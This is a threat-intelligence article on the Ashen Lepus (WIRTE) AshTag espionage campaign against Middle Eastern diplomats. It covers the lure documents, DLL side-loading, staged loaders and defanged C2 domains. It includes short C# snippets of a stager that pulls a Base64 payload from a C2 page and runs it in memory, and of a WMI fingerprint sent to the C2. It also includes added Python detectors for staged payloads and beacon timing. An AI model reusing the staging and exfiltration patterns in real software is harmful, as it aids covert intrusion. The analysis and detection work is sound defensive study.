A Hamas-affiliated threat group commonly known as Ashen Lepus, also tracked as WIRTE, has launched a new espionage campaign against governmental and diplomatic entities across the Middle East.
The group uses realistic Arabic-language diplomatic lures that reference regional politics and security talks to trick officials into opening weaponized documents.
Once a target interacts with the lure, a multi-stage chain quietly delivers a new custom malware suite named AshTag, designed to steal sensitive diplomatic documents and maintain long-term access to compromised systems.
Lure examples presented to targets (Source – Palo Alto Networks)
The operation has continued through recent regional conflicts and even after the October 2025 Gaza ceasefire, underlining the group's focus on persistent intelligence collection rather than short-term disruption.
The attackers rely on benign-looking PDFs that direct victims to download RAR archives containing a fake document executable, a malicious loader, and an extra decoy PDF.
When the victim runs what appears to be a document, Windows side-loads a hidden malicious DLL and begins the infection, while a harmless PDF opens on screen to reduce suspicion.
AshTag's initial infection chain (Source – Palo Alto Networks)
Palo Alto Networks security researchers identified this new AshTag toolkit while monitoring long-running Ashen Lepus activity and noticed clear changes in both the malware and its command-and-control (C2) infrastructure.
Instead of using dedicated attacker-owned domains, the group now hides behind API-style subdomains of legitimate-looking sites, such as api.healthylifefeed[.]com and auth.onlinefieldtech[.]com, to make their traffic blend in with normal web activity.
At the same time, payloads are executed in memory to leave fewer forensic traces on disk.
AshTag Infection Mechanism and Orchestrator Design
At the core of the campaign is a modular .NET backdoor, AshTag, which masquerades as a VisualServer utility but actually supports file exfiltration, command execution and in-memory loading of additional tools.
The chain moves from an initial loader dubbed AshenLoader, to a secondary stager called AshenStager, and finally to an orchestration component, AshenOrchestrator, which controls all later modules.
The full AshTag malware infection chain (Source – Palo Alto Networks)
AshenLoader sends basic host information to the C2 and fetches AshenStager from HTML content hidden between custom headerp tags.
AshenStager then requests another page and extracts a Base64-encoded payload buried inside article tags.
AshenOrchestrator's Base64-encoded payload embedded inside the article HTML tags (Source – Palo Alto Networks)
A simplified version of this parsing logic can be expressed as:
using System;
using System.Text.RegularExpressions;
// Fetch the staging page and pull the Base64 text out of the <article> element.
var html = GetHtml(c2Url);
var match = Regex.Match(html, "<article[^>]*>(?<data>[^<]+)</article>");
var b64 = match.Groups["data"].Value;
var payload = Convert.FromBase64String(b64);
ExecuteInMemory(payload);
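The staging pattern above, where the stager's regex lifts a Base64 blob out of a single HTML element, can be turned around for detection. The following Python is an added example written for this page, not code from the original article or from Palo Alto Networks: it scans a captured HTTP response body for Base64 content inside the headerp and article elements the article names, decodes it, and labels the result as a PE image (leading MZ bytes), a JSON object (reporting any of the mn, mx, tg, au and mna keys the article attributes to the orchestrator configuration) or unknown. The classification heuristics, the 16-character minimum and the sample HTML with its placeholder config values are assumptions and constructed data made for this example.

```python
import base64
import binascii
import json
import re

# Elements the article says AshTag stages payloads in: a custom <headerp> tag
# for AshenStager and <article> for the orchestrator payload.
STAGING_TAGS = ("headerp", "article")

# Keys the article attributes to the AshenOrchestrator JSON configuration.
ASHTAG_CONFIG_KEYS = {"mn", "mx", "tg", "au", "mna"}

# Assumed minimum Base64 length worth reporting; short words in ordinary prose
# that happen to be valid Base64 are ignored.
MIN_B64_LEN = 16


def _tag_pattern(tag):
    # Same shape as the stager's own regex: the text content of one element.
    return re.compile(rf"<{tag}[^>]*>(?P<data>[^<]+)</{tag}>", re.IGNORECASE)


def classify_blob(raw):
    """Label decoded bytes as ('pe', []), ('json', matched_keys) or ('unknown', [])."""
    if raw.startswith(b"MZ"):
        return "pe", []
    try:
        obj = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return "unknown", []
    keys = sorted(ASHTAG_CONFIG_KEYS & set(obj)) if isinstance(obj, dict) else []
    return "json", keys


def extract_hidden_payloads(html):
    """Return one finding per Base64 blob hidden inside a staging element."""
    findings = []
    for tag in STAGING_TAGS:
        for m in _tag_pattern(tag).finditer(html):
            text = "".join(m.group("data").split())  # tolerate wrapped lines
            if len(text) < MIN_B64_LEN or len(text) % 4:
                continue
            try:
                raw = base64.b64decode(text, validate=True)
            except (binascii.Error, ValueError):
                continue  # ordinary page text, not a payload
            kind, keys = classify_blob(raw)
            findings.append({"tag": tag, "kind": kind, "size": len(raw), "config_keys": keys})
    return findings


# Constructed sample response: one benign article, one carrying a JSON config
# with placeholder values, and a <headerp> element carrying a PE-like blob.
_CONFIG = json.dumps({"mn": 30, "mx": 120, "tg": "tg-placeholder",
                      "au": "au-placeholder", "mna": 2}).encode()
SAMPLE_HTML = (
    "<html><body>"
    "<article>Regional security talks continue this week.</article>"
    "<article class='post'>" + base64.b64encode(_CONFIG).decode() + "</article>"
    "<headerp>" + base64.b64encode(b"MZ" + b"\x00" * 62).decode() + "</headerp>"
    "</body></html>"
)

if __name__ == "__main__":
    for finding in extract_hidden_payloads(SAMPLE_HTML):
        print(finding)
```

Run against the constructed page it reports two findings: a PE-like blob in the headerp element and a JSON object in the second article element carrying all five configuration keys, while the ordinary article text is skipped because it is not valid Base64. Feeding it decoded proxy or sandbox response bodies for the API-style subdomains mentioned earlier gives a cheap check for this staging pattern without needing the loader itself.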
AshenOrchestrator receives a Base64-encoded JSON configuration that includes C2 domains, module URLs, encryption keys and jitter values mn and mx to randomize beacon timing.
It first derives an AES key from the tg and au parameters, then decrypts an XOR key used to decode the next embedded payload.
That payload is another Base64-encoded JSON object that defines the module's class name, such as SN for system fingerprinting or SCT for screen capture, and the loading method mna, which can direct the orchestrator to save a module to disk, execute it as a .NET assembly, add further content or inject code into memory.
Decoded AshenOrchestrator configuration (Source – Palo Alto Networks)
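The mn and mx jitter values give defenders a timing signature to look for in proxy or firewall logs. The Python below is an added example written for this page, not code from the article or from Palo Alto Networks: it takes the request timestamps from one host to one destination, computes the gaps between consecutive requests, and flags traffic whose gaps all sit inside a narrow band, which is what a sleep randomized between mn and mx produces, reporting the observed band as an estimate of the beacon's mn and mx. The thresholds (at least eight requests, longest gap no more than four times the shortest, shortest gap at least five seconds) and both sample timelines are assumptions and constructed data made for this example, not values from the article.

```python
import statistics
from datetime import datetime, timedelta


def gaps_seconds(timestamps):
    """Inter-request gaps in seconds for a list of datetimes (any order)."""
    ts = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def beacon_profile(timestamps, min_requests=8, max_spread=4.0, min_gap=5.0):
    """Summarise the timing of requests from one host to one destination.

    A sleep randomised between mn and mx seconds yields gaps that are all
    bounded by that band, so the longest gap is only a small multiple of the
    shortest. Interactive browsing mixes sub-second bursts with long idle
    periods and fails that test. Thresholds are assumed values for this example.
    """
    gaps = gaps_seconds(timestamps)
    if len(gaps) < min_requests - 1:
        return {"suspicious": False, "reason": "too few requests", "gaps": len(gaps)}
    lo, hi = min(gaps), max(gaps)
    spread = hi / lo if lo > 0 else float("inf")
    return {
        "suspicious": spread <= max_spread and lo >= min_gap,
        "est_mn": lo,  # observed band lower edge, comparable to a decoded mn
        "est_mx": hi,  # observed band upper edge, comparable to a decoded mx
        "median_gap": statistics.median(gaps),
        "spread": round(spread, 2),
    }


def timeline(start, gaps):
    """Build a timestamp list from a start time and a list of gaps in seconds."""
    ts = [start]
    for g in gaps:
        ts.append(ts[-1] + timedelta(seconds=g))
    return ts


T0 = datetime(2025, 11, 3, 9, 0, 0)
# Constructed: a beacon sleeping a random 30..90 s between check-ins.
BEACON_TS = timeline(T0, [31, 88, 45, 60, 72, 39, 85, 50, 66, 33])
# Constructed: a person browsing the same site, bursts followed by long idle gaps.
BROWSING_TS = timeline(T0, [2, 1, 340, 15, 1, 1200, 4, 60, 3, 2])

if __name__ == "__main__":
    for name, ts in (("beacon", BEACON_TS), ("browsing", BROWSING_TS)):
        print(name, beacon_profile(ts))
```

On the constructed data the beacon timeline is flagged with an estimated band of 31 to 88 seconds, while the browsing timeline fails both the minimum-gap and spread tests. Grouping real log lines by source host and destination before calling beacon_profile is the natural way to apply it, and the estimated band can be compared with the mn and mx values recovered from a decoded configuration.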
One recovered module, SN, performs host profiling through simple WMI queries and sends a unique victim ID back to the attackers, helping Ashen Lepus focus on high-value diplomatic systems.
AshTag module decoding process (Source – Palo Alto Networks)
A basic version of this logic can be illustrated as:
// Read the machine's UUID through WMI and post it to the C2 registration endpoint.
var id = GetWmi("Win32_ComputerSystemProduct", "UUID");
PostToC2("/api/v2/register", id);
This careful layering of loaders, HTML-hidden payloads, and modular .NET components shows that Ashen Lepus is steadily improving its tradecraft while keeping the code base simple, flexible and tuned for stealthy diplomatic espionage.